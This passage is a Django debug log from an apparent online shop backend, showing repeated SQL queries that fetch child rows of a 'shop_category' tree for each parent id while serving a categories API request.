"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:56,173 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:56,177 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:56,181 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:56,185 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:56,190 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:56,195 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:56,200 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:56,203 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:56,208 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:56,214 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:56,218 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:56,222 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:56,226 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:56,230 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:56,238 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:47:56,242 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:56,248 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:56,252 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:56,256 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:56,260 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:56,265 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:47:56,269 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:47:56,273 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:47:56,277 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:47:56,281 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:47:56,288 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:47:56,292 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:47:56,296 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:47:56,300 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:47:56,304 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:47:56,310 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:47:56,314 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:47:56,318 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:47:56,322 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:47:56,326 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:47:56,330 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:47:56,335 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:47:56,339 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:47:56,343 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:47:56,348 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:47:56,352 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:47:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 22:47:59,064 utils 2749 140297233225472 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 22:47:59,075 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:47:59,081 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:47:59,085 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:47:59,091 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:47:59,095 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:47:59,099 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:47:59,102 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:47:59,106 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:47:59,112 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:47:59,116 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:47:59,120 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:47:59,124 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:47:59,128 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:47:59,133 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:47:59,137 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:47:59,141 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:47:59,145 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:47:59,149 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:47:59,155 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:47:59,159 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:47:59,163 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:47:59,166 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:47:59,170 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:47:59,174 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:47:59,180 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 